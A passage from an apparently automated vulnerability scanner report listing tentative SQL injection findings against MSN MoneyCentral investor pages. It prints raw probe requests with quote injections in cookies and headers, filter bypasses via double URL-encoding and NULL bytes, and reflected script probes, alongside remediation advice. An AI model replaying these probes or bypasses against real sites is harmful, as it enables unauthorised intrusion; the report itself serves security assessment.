Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F%2527%2527; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:15:28 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 55922


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...

1.46. http://redacted/investor/StockRating/srstopstocksresults.aspx [expid cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /investor/StockRating/srstopstocksresults.aspx

Issue detail

The expid cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the expid cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /investor/StockRating/srstopstocksresults.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2';

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:05:33 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /investor/StockRating/srstopstocksresults.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2'';

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 18:05:33 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 56048


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...

1.47. http://redacted/investor/StockRating/srstopstocksresults.aspx [v1st cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /investor/StockRating/srstopstocksresults.aspx

Issue detail

The v1st cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the v1st cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /investor/StockRating/srstopstocksresults.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4'; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Length: 3080
Content-Type: text/html
Last-Modified: Wed, 04 Jun 2008 17:06:59 GMT
Accept-Ranges: bytes
ETag: "40a29a6665c6c81:16c4d"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 18:05:23 GMT
Connection: close

<LINK REL=STYLESHEET HREF=/inc/winstyle.css>
<STYLE TYPE=text/css><!--

.heading3 {color:#CC9900; font-weight: bold;font-size:11pt;font-family: Arial,Helvetica;}
.CatBackground {background:#CC9900
...[SNIP]...
<BR>

If you received this message in error, we apologize for the inconvenience.<BR>
...[SNIP]...

Request 2

GET /investor/StockRating/srstopstocksresults.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4''; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 18:05:24 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 56048


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...

1.48. http://redacted/investor/StockRating/srstopstocksresults.aspx [v1st cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /investor/StockRating/srstopstocksresults.aspx

Issue detail

The v1st cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the v1st cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the v1st cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /investor/StockRating/srstopstocksresults.aspx?sco=1 HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4%2527; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 02:16:18 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /investor/StockRating/srstopstocksresults.aspx?sco=1 HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4%2527%2527; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:16:19 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 55922


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...

1.49. http://redacted/investor/charts/chartdl.aspx [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /investor/charts/chartdl.aspx

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5 HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%00'
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D; userCh=4=1&8=0&20=0

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 15:09:36 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5 HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%00''
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D; userCh=4=1&8=0&20=0

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Sun, 30 Jan 2011 15:09:37 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Server: TK2MCWBA01
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Vary: Accept-Encoding
Content-Length: 24676


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...

1.50. http://redacted/investor/charts/chartdl.aspx [__qca cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /investor/charts/chartdl.aspx

Issue detail

The __qca cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __qca cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /investor/charts/chartdl.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610'; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Length: 3080
Content-Type: text/html
Last-Modified: Wed, 04 Jun 2008 17:06:59 GMT
Accept-Ranges: bytes
ETag: "40a29a6665c6c81:153c9"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 18:05:33 GMT
Connection: close

<LINK REL=STYLESHEET HREF=/inc/winstyle.css>
<STYLE TYPE=text/css><!--

.heading3 {color:#CC9900; font-weight: bold;font-size:11pt;font-family: Arial,Helvetica;}
.CatBackground {background:#CC9900
...[SNIP]...
<BR>

If you received this message in error, we apologize for the inconvenience.<BR>
...[SNIP]...

Request 2

GET /investor/charts/chartdl.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610''; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 18:05:33 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 24654


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...

1.51. http://redacted/investor/charts/chartdl.aspx [expid cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /investor/charts/chartdl.aspx

Issue detail

The expid cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the expid cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5 HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://investing.money.redacted/investments/charts?Symbol=indu22b72%22%3balert(document.cookie)//2badde9cef5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2'; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 15:09:14 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5 HTTP/1.1
Host: redacted
Proxy-Connection: keep-alive
Referer: http://investing.money.redacted/investments/charts?Symbol=indu22b72%22%3balert(document.cookie)//2badde9cef5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; userCh=4=0&8=0&20=0; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2''; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Sun, 30 Jan 2011 15:09:15 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Vary: Accept-Encoding
Content-Length: 24815


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...

1.52. http://redacted/investor/charts/chartdl.aspx [v1st cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /investor/charts/chartdl.aspx

Issue detail

The v1st cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the v1st cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /investor/charts/chartdl.aspx?symbol= HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4'; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 02:16:17 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /investor/charts/chartdl.aspx?symbol= HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4''; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:16:18 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-FRAME-OPTIONS: DENY
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 24661


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<meta http-e
...[SNIP]...

1.53. http://redacted/investor/home.aspx [CC cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /investor/home.aspx

Issue detail

The CC cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the CC cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /investor/home.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US%00'; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:02:44 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /investor/home.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US%00''; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 30 Jan 2011 18:02:45 GMT
Server: Microsoft-IIS/6.0
Location: http://money.redacted/investing
Content-Length: 62

object moved <a href="http://money.msn.com/investing">here</a>

1.54. http://redacted/investor/home.aspx [CULTURE cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://moneycentral.msn.com
Path:   /investor/home.aspx

Issue detail

The CULTURE cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the CULTURE cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the CULTURE cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /investor/home.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US%2527; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Date: Sun, 30 Jan 2011 18:02:16 GMT
Connection: close
Content-Length: 28

<h1>Service Unavailable</h1>

Request 2

GET /investor/home.aspx HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US%2527%2527; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 30 Jan 2011 18:02:18 GMT
Server: Microsoft-IIS/6.0
